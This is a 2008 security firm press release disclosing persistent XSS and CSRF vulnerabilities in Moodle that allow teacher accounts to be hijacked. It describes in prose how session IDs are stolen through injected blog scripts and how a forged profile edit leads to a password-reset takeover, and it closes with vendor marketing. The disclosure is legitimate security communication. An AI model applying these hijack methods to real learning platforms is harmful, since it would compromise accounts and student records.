Press Releases
Monday, 14 July 2008 : Teachers beware: Students have potential to compromise site and change grades.
London, UK – 14 th July 08
Moodle, a leading product within the academic portals arena, which is used by world-class universities and other academic institutions, is vulnerable to take over of teacher accounts. The vulnerability would allow the perpetrator to manage the account and even gain access to high-privileged functionalities such as grades tracking (viewing and changing) and retrieval of exams and assignments submitted by other students.
Adrian Pastor and Amir Azam of ProCheckUp Ltd have found two serious vulnerabilities that allow malicious users to take over accounts. By simply tricking a teacher user to click on a link while being logged onto a Moodle site, his account can be hijacked by a malicious user (i.e. disgruntled student).
Amir Azam of ProCheckUp said “Once a malicious user identifies the administrator’s account and tricks him to click on a malicious link, the attacker is only limited by his own imagination ….”
Since Moodle sites provide so many user-interaction capabilities – i.e. blogs, chats, public profiles – it is very realistic to assume that a teacher could be tricked to click on a link posted by a malicious student on the Moodle site.
The two serious vulnerabilities in question are Persistent XSS (Cross-site Scripting) and CSRF (Cross-site Request Forgery). Both vulnerabilities were successfully exploited by Adrian and Amir during a penetration test in order to compromise teacher accounts.
In the persistent XSS demo exploit provided by ProCheckUp, user accounts can be hijacked by injecting a piece of JavaScript code in the public blogs section. Such code would forward the session ID of all users who access the blogs section to the attacker. Thus allowing the attacker to login as any user.
In the case of the CSRF demo exploit, the “edit profile” request is forged when the victim clicks on the malicious link. Such forged request would change the victim’s email address to the attacker’s. Once such change is made, the attacker can go to the Moodle site, and request a new password (“lost password?” link) by providing his email address. At this point, the victim’s account is hijacked (i.e.: attacker can login using the victim’s account).
Although the exploits were not tested against administrator accounts – they were tested against teacher accounts instead -, they are also suspected to work against such accounts.
Note: usually, Moodle sites have four types of user accounts: guest, student, teacher and administrator. Compromising an administrator account would lead to a total compromise of the Moodle site.
About ProCheckUp
A leading independent specialist security organisation, ProCheckUp was formed in 2000 to provide a unique Artificial Intelligence (AI) based penetration testing service to the corporate market.
Since then the company has enjoyed significant commercial and technological success, and received Royal recognition in April 2004 by winning the prestigious Queen's Award for Enterprise: Innovation, the UK's highest accolade for business performance.
ProCheckUp are service providers to some of the world's leading finance and banking organisations, international law firms and FTSE 100 companies.
About ProCheckNet
ProCheckUp has adopted the methodology of conventional penetration testing and combined it with the functionality of a distributed automated attack system called ProCheckNet.
ProCheckNet automates the complex processes and decision making associated with a manual penetration testing team. It builds customised exploits in an entirely safe manner to achieve a level of testing unrivalled by conventional approaches. Complimented with features such as real time encapsulated exploits, firewall and IDS bypass, ProCheckNet is a revolutionary attack system. Companies that require the highest level of security assurance utilise ProCheckNet to test all their internal and externally facing IT infrastructure including brochure ware, E-commerce websites, RAS, VPN's, Mailservices, DNS and even entirely bespoke applications.